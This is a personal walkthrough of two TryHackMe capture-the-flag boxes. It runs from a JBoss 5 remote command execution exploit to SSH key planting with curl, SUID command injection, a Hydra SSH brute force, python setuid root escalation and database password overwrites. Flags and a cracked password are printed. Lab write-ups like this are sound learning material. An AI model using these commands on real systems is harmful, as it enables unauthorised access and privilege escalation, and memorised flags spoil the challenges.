Jacob the Boss

Find a way in and learn a little more.
First of all, add the jacobtheboss.box address to your hosts file

This is Jacob the Boss from THM.


Quite a few here:

22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
1090/tcp open ff-fms
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3306/tcp open mysql
3873/tcp open fagordnc
4444/tcp open krb524
4445/tcp open upnotifyp
4446/tcp open n1-fwp
4457/tcp open prRegister
4712/tcp open unknown
4713/tcp open pulseaudio
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
36348/tcp open unknown
40701/tcp open unknown
44894/tcp open unknown

Yikes! I didn’t run a detail scan.


At http://jacobtheboss.box:8080/ we find JBoss, and if we click through to http://jacobtheboss.box:8080/web-console/ we find, amongst other things:

JBoss™ Application Server
Version: 5.0.0.GA (build: SVNTag=JBoss_5_0_0_GA date=200812041721)
Version Name: Morpheus
Built on: December 4 2008

So this is old as anything; who wants to bet it’s our way in?


root@kali:/opt/tryhackme/jacob# searchsploit jboss
JBoss AS 3/4/5/6 - Remote Command Execution | multiple/webapps/36575.py

Seems a likely candidate. I mirror it and try per the instructions:

root@kali:/opt/tryhackme/jacob# python 36575.py http://jacobtheboss.box:8080

But it doesn’t seem happy; I hardcode the port in the script and make a minor change to the argument parsing and this sorts it out, and I get a shell (of sorts).

For some reason I couldn’t get the shell I had to send me a ‘normal’ reverse shell, so instead I created an authorized_keys file and copied over my SSH public key. From there I could SSH in as Jacob.

[Type commands or "exit" to finish]
Shell> mkdir /home/jacob/.ssh       
Shell> curl -o /home/jacob/.ssh/authorized_keys

And separately:

root@kali:/opt/tryhackme/jacob# python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - [04/Jan/2021 05:21:34] "GET /id_rsa.pub HTTP/1.1" 200 -


root@kali:/opt/tryhackme/jacob# ssh jacob@
[jacob@jacobtheboss ~]$


Privesc was via an intentionally vulnerable SUID binary:

[jacob@jacobtheboss shm]$ pingsys '; /bin/bash'
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.016 ms
64 bytes from icmp_seq=2 ttl=64 time=0.029 ms
--- ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.016/0.022/0.029/0.008 ms
[root@jacobtheboss shm]# cd /root
[root@jacobtheboss root]#

While I was mucking around with this I also logged into the MySQL server on the host and grabbed Jacob’s hash from the DotClear database (it was running on Port 80); couldn’t break it though. Since I couldn’t break it I decided to change it:

MariaDB [dotclear]> update dc_user set user_pwd = '$2y$12$mjwHvY4jPzz2hu3RAmxn..n7Yp3.ey2TiYjesOxPgcX0V1f2INw1S' where user_id = 'jacob';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

This was just ‘password’ from https://bcrypt-generator.com/ but it didn’t help at all. Lol.


I also had a go at this. It doesn’t award any points and there are apparently 9 flags. I rooted the box and found 7 of them.

My notes look like below. Essentially we got a hint about weak passwords from the FTP server with anon access, I tried Hydra and got in, then Python had the setuid capability set so that was root. I ran around and found most of the flags. The first flag was on the FTP server.

root@kali:/opt/tryhackme/koth# hydra -l rcampbell -P /usr/share/wordlists/rockyou.txt ssh://
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-04 04:35:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 14344239 to do in 1440:12h, 16 active
[STATUS] 114.00 tries/min, 342 tries in 00:03h, 14344063 to do in 2097:06h, 16 active
[STATUS] 109.14 tries/min, 764 tries in 00:07h, 14343641 to do in 2190:21h, 16 active
[22][ssh] host:   login: rcampbell   password: maddie

rcampbell@gibson:~$ ls -lash
total 32K
4.0K drwxr-x--- 4 rcampbell rcampbell 4.0K Jan  4 09:42 .
4.0K drwxr-xr-x 6 root      root      4.0K Apr 29  2020 ..
   0 lrwxrwxrwx 1 rcampbell rcampbell    9 Apr 30  2020 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 rcampbell rcampbell  220 Apr 29  2020 .bash_logout
4.0K -rw-r--r-- 1 rcampbell rcampbell 3.7K Apr 29  2020 .bashrc
4.0K drwx------ 2 rcampbell rcampbell 4.0K Jan  4 09:42 .cache
4.0K -r-------- 1 rcampbell rcampbell   38 Apr 30  2020 .flag
4.0K drwx------ 3 rcampbell rcampbell 4.0K Jan  4 09:42 .gnupg
4.0K -rw-r--r-- 1 rcampbell rcampbell  807 Apr 29  2020 .profile
rcampbell@gibson:~$ cat .flag
thm{12361ad240fec43005844016092f1e05} FLAG 2

rcampbell@gibson:/dev/shm$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1002(rcampbell) groups=1002(rcampbell)

# cat .flag
thm{b94f8d2e715973f8bc75fe099c8492c4} // root flag FLAG 3

# cat business.txt
Remember to send the accounts to Rich by 5pm Friday.

Remember to change my password, before the meeting with Mr Belford.
I hope he doesnt fire me. I need to provide for my family
I need to send Ben the flag too, thm{d8deb5f0526ec81f784ce68e641cde40} // gcrawford FLAG 4

# cat .flag // production
thm{879f3238fb0a4bf1c23fd82032d237ff} // FLAG 5

# cat .flag // tryhackme
thm{3ce2fe64055d3b543360c3fc880194f8} // FLAG 6

# pwd
# grep -r -i flag
Binary file server matches
resources/main.css:/* Curious one, arent you? Have a flag. thm{b63670f7192689782a45d8044c63197f}*/ // FLAG 7